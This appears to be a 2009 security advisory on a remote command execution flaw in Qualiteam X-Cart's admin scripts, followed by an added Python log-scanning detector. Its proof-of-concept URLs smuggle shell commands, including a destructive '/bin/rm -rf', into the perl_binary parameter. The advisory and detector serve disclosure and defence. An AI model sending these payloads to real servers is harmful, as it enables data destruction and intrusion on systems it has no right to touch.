
Qualiteam X-Cart Remote Command Execution Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://server/admin/upgrade.php?prepatch_errorcode=1&patch_files[0][orig_file]=VERSION&perl_binary=/bin/rm -rf &patch_exe=..

http://server/admin/general.php?mode=perlinfo&config[General][perl_binary]=/bin/ls -lR ||
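For triage, the following added example (not part of the original advisory or of X-Cart) scans web server access logs for requests to the two admin scripts above that carry the parameter names used in the proof-of-concept URLs. It assumes Common/Combined Log Format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names taken from the two proof-of-concept URLs on this page.
SUSPECT_PARAMS = {"perl_binary", "patch_exe", "config[General][perl_binary]"}
# Scripts named in the proof-of-concept URLs (matched as a suffix so that
# installs under a subdirectory are covered too).
SUSPECT_PATHS = ("/admin/upgrade.php", "/admin/general.php")

# Request line inside a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return the sorted suspect parameter names found in one log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith(SUSPECT_PATHS):
        return []
    # parse_qsl percent-decodes names, so config%5BGeneral%5D... also matches.
    names = {name for name, _ in parse_qsl(url.query, keep_blank_values=True)}
    return sorted(names & SUSPECT_PARAMS)

def scan(lines):
    """Return (line_index, matched_params) for every flagged log line."""
    return [(i, hits) for i, line in enumerate(lines)
            if (hits := suspicious_params(line))]

# Constructed sample log lines (documentation IP ranges, harmless values).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2009:10:00:00 +0000] "GET /admin/upgrade.php?'
    'prepatch_errorcode=1&patch_files[0][orig_file]=VERSION&perl_binary=/bin/ls'
    '&patch_exe=.. HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2009:10:00:05 +0000] "GET /admin/general.php?'
    'mode=perlinfo&config%5BGeneral%5D%5Bperl_binary%5D=/bin/ls%20-lR '
    'HTTP/1.1" 200 900',
    '198.51.100.7 - - [01/Jan/2009:10:01:00 +0000] "GET /admin/general.php?'
    'mode=perlinfo HTTP/1.1" 200 900',
    '198.51.100.7 - - [01/Jan/2009:10:02:00 +0000] "GET /product.php?'
    'productid=1 HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG):
        print(f"line {index}: suspect parameters {hits}")
```

Parameters sent in a POST body do not appear in access logs, so this check covers query-string requests only.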







 

Copyright 2009, SecurityFocus